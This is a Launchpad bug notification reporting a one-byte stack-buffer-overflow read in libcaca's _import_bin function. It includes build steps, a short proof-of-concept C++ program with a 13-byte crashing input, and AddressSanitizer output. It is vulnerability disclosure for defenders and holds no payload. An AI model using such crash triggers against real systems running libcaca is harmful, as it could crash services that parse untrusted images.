** Description changed: Hello ubuntu security team + + issues:https://github.com/cacalabs/libcaca/issues/56 + System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 + libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; void crash(const uint8_t *Data, size_t Size) { - if(Size<8) return ; - size_t len=0; - caca_canvas_t *cv; - cv = caca_create_canvas(0,0); - caca_create_frame(cv,0); - caca_set_frame(cv,0); - caca_import_canvas_from_memory(cv,Data,Size,"bin"); - caca_free_canvas(cv); - cv=NULL; + if(Size<8) return ; + size_t len=0; + caca_canvas_t *cv; + cv = caca_create_canvas(0,0); + caca_create_frame(cv,0); + caca_set_frame(cv,0); + caca_import_canvas_from_memory(cv,Data,Size,"bin"); + caca_free_canvas(cv); + cv=NULL; } int main(int args,char* argv[]){ - size_t len = 0; - unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; - len = sizeof(buffer)/sizeof(unsigned char); - printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); - crash((const uint8_t*)buffer,len); - return 0; + size_t len = 0; + unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; + len = sizeof(buffer)/sizeof(unsigned char); + printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); + crash((const uint8_t*)buffer,len); + return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer 
-fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: ================================================================= ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 - #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 - #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 - #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 - #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) + #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 + #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 + #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 + #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 + #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame - #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 + #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 - This frame has 1 object(s): - [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable + This frame has 1 object(s): + [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork - (longjmp and C++ exceptions *are* supported) + (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes 
around the buggy address: - 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 - 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): - Addressable: 00 - Partially addressable: 01 02 03 04 05 06 07 - Heap left redzone: fa - Freed heap region: fd - Stack left redzone: f1 - Stack mid redzone: f2 - Stack right redzone: f3 - Stack after return: f5 - Stack use after scope: f8 - Global redzone: f9 - Global init order: f6 - Poisoned by user: f7 - Container overflow: fc - Array cookie: ac - Intra object redzone: bb - ASan internal: fe - Left alloca redzone: ca - Right alloca redzone: cb - Shadow gap: cc + Addressable: 00 + Partially addressable: 01 02 
03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc ==3817476==ABORTING Thanks
-- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello ubuntu security team

  issue: https://github.com/cacalabs/libcaca/issues/56

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1. Get the source code of libcaca
  2. Compile the libcaca.so library
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
  $ make
  3. Create the poc_bin.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>
  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {
      if(Size<8) return ;
      size_t len=0;
      caca_canvas_t *cv;
      cv = caca_create_canvas(0,0);
      caca_create_frame(cv,0);
      caca_set_frame(cv,0);
      caca_import_canvas_from_memory(cv,Data,Size,"bin");
      caca_free_canvas(cv);
      cv=NULL;
  }

  int main(int args,char* argv[]){
      size_t len = 0;
      unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
      len = sizeof(buffer)/sizeof(unsigned char);
      printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
      crash((const uint8_t*)buffer,len);
      return 0;
  }

  4. Compile poc_bin.cc
  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
  5. Run poc_bin

  asan info:
  =================================================================
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
      #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33
      #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
      #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
      #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
      #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
      [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
        (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
    0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
    0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
    Shadow gap:              cc
  ==3817476==ABORTING

  Note: the faulting read is at offset 45 of the [32, 45) 'buffer' object, i.e. one byte past the end of the 13-byte input passed as Size, so _import_bin is reading beyond the length it was given.

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925468/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp